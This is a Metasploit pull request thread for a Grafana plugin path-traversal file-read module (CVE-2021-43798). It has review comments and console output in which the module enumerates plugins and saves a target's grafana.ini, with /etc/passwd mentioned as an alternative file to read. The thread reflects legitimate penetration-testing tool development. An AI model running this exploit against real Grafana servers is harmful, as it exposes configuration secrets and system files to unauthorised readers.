Draft: grafana file read (CVE-2021-43798)
rapid7/metasploit-framework pull request #15954
Opened 2021-12-13 10:30 UTC by h00die

Adds a module to exploit grafana file read CVE-2021-43798.  Module is working, still needs:

1. description
2. authors
3. store loot
4. implement https://github.com/jas502n/Grafana-CVE-2021-43798
5. docs
6. some error handling
7. check command to validate versions

2021-12-13 10:31 UTC, h00die commented
will finish up soon, but since this is working and i see grafana often in pentests, wanted to get something out there

2021-12-15 21:35 UTC, h00die commented
ready

2021-12-16 14:42 UTC, smcintyre-r7 requested changes

2021-12-16 14:42 UTC, smcintyre-r7 commented on modules/auxiliary/scanner/http/grafana_plugin_traversal.rb
> +      'alertlist',
Could we move this into a dedicated file like what we currently have for Wordpress?  Something like `data/grafana-plugins.txt`.

2021-12-16 14:42 UTC, smcintyre-r7 commented on modules/auxiliary/scanner/http/grafana_plugin_traversal.rb
> +      print_good("#{rhost}:#{rport} - File saved in: #{path}")
It would be worthwhile here to note the plugin that this was successful with.

2021-12-16 14:42 UTC, smcintyre-r7 commented on modules/auxiliary/scanner/http/grafana_plugin_traversal.rb
> +      'alertlist',
Once this is moved into a list, it would be helpful if the user had the option to test a specific plugin. When nothing is specified, the module can default to this list. When one is found though the user can set the plugin to the one they know will work to avoid having to check them all again.

2021-12-16 21:28 UTC, bwatters-r7 commented
In an effort to be _efficient_ I tried to run this as a docker container.:
`docker run -p 3000:3000 --name grafana bitnami/grafana:8.1.5`

It says that many of these plugins are installed by default, but none are showing up on 8.1.5 or 8.3.0 (your versions in testing)

```
msf6 auxiliary(scanner/http/grafana_plugin_traversal) > run

[+] Detected vulnerable Grafina: 8.1.5
[*] Attempting plugin: alertlist
[*] Attempting plugin: annolist
[*] Attempting plugin: barchart
[*] Attempting plugin: bargauge
[*] Attempting plugin: candlestick
[*] Attempting plugin: cloudwatch
[*] Attempting plugin: dashlist
[*] Attempting plugin: elasticsearch
[*] Attempting plugin: gauge
[*] Attempting plugin: geomap
[*] Attempting plugin: gettingstarted
[*] Attempting plugin: grafana-azure-monitor-datasource
[*] Attempting plugin: graph
[*] Attempting plugin: heatmap
[*] Attempting plugin: histogram
[*] Attempting plugin: influxdb
[*] Attempting plugin: jaeger
[*] Attempting plugin: logs
[*] Attempting plugin: loki
[*] Attempting plugin: mssql
[*] Attempting plugin: mysql
[*] Attempting plugin: news
[*] Attempting plugin: nodeGraph
[*] Attempting plugin: opentsdb
[*] Attempting plugin: piechart
[*] Attempting plugin: pluginlist
[*] Attempting plugin: postgres
[*] Attempting plugin: prometheus
[*] Attempting plugin: stackdriver
[*] Attempting plugin: stat
[*] Attempting plugin: state-timeline
[*] Attempting plugin: status-history
[*] Attempting plugin: table
[*] Attempting plugin: table-old
[*] Attempting plugin: tempo
[*] Attempting plugin: testdata
[*] Attempting plugin: text
[*] Attempting plugin: timeseries
[*] Attempting plugin: welcome
[*] Attempting plugin: zipkin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/grafana_plugin_traversal) > run

[+] Detected vulnerable Grafina: 8.3.0
[*] Attempting plugin: alertlist
[*] Attempting plugin: annolist
[*] Attempting plugin: barchart
[*] Attempting plugin: bargauge
[*] Attempting plugin: candlestick
[*] Attempting plugin: cloudwatch
[*] Attempting plugin: dashlist
[*] Attempting plugin: elasticsearch
[*] Attempting plugin: gauge
[*] Attempting plugin: geomap
[*] Attempting plugin: gettingstarted
[*] Attempting plugin: grafana-azure-monitor-datasource
[*] Attempting plugin: graph
[*] Attempting plugin: heatmap
[*] Attempting plugin: histogram
[*] Attempting plugin: influxdb
[*] Attempting plugin: jaeger
[*] Attempting plugin: logs
[*] Attempting plugin: loki
[*] Attempting plugin: mssql
[*] Attempting plugin: mysql
[*] Attempting plugin: news
[*] Attempting plugin: nodeGraph
[*] Attempting plugin: opentsdb
[*] Attempting plugin: piechart
[*] Attempting plugin: pluginlist
[*] Attempting plugin: postgres
[*] Attempting plugin: prometheus
[*] Attempting plugin: stackdriver
[*] Attempting plugin: stat
[*] Attempting plugin: state-timeline
[*] Attempting plugin: status-history
[*] Attempting plugin: table
[*] Attempting plugin: table-old
[*] Attempting plugin: tempo
[*] Attempting plugin: testdata
[*] Attempting plugin: text
[*] Attempting plugin: timeseries
[*] Attempting plugin: welcome
[*] Attempting plugin: zipkin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/grafana_plugin_traversal) > 
```

2021-12-19 21:04 UTC, h00die commented
well, this was easy! the `grafana.ini` I used is the default on Ubuntu.  The Bitnomi image you used has the file in `/opt/binami/grafana/conf/grafana.ini`.  If you change it to that, or something basic like `/etc/passwd`, it'll work.  Tackling the other comments now as well.

2021-12-19 21:18 UTC, h00die commented
aight i think i got everything covered now. added the docker image output to the docs as well.

2021-12-20 15:52 UTC, bwatters-r7 commented
oooops....  Yup; sorry about that; I was unfamiliar with this one and had not really dug in.  Changing the filepath was all I needed to do.

```
msf6 auxiliary(scanner/http/grafana_plugin_traversal) > show options

Module options (auxiliary/scanner/http/grafana_plugin_traversal):

   Name          Current Setting                       Required  Description
   ----          ---------------                       --------  -----------
   DEPTH         13                                    yes       Traversal depth
   FILEPATH      /opt/bitnami/grafana/conf/grafana.in  yes       The name of the file to download
                 i
   PLUGINS_FILE  /home/tmoose/rapid7/metasploit-frame  yes       File containing plugins to enumerate
                 work/data/wordlists/grafana_plugins.
                 txt
   Proxies                                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.5.134.107                          yes       The target host(s), see https://github.com/rapid7/metasploit-frame
                                                                 work/wiki/Using-Metasploit
   RPORT         3000                                  yes       The target port (TCP)
   SSL           false                                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                                     yes       Path to Grafana instance
   THREADS       1                                     yes       The number of concurrent threads (max one per host)
   VHOST                                               no        HTTP server virtual host
msf6 auxiliary(scanner/http/grafana_plugin_traversal) > run

[+] Detected vulnerable Grafina: 8.3.0
[*] 10.5.134.107 - Progress   0/40 (0.0%)
[+] alertlist was found and exploited successfully
[+] 10.5.134.107:3000 - File saved in: /home/tmoose/.msf4/loot/20211220095106_default_10.5.134.107_grafana.loot_088290.ini
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

2021-12-20 15:54 UTC, merged

2021-12-20 15:55 UTC, bwatters-r7 commented
# Release Notes
Adds a module to exploit Grafana file read vulnerability CVE-2021-43798.

2021-12-20 20:04 UTC, h00die commented
no problem, thanks for taking care of this one!  I always throw a curve ball your way each module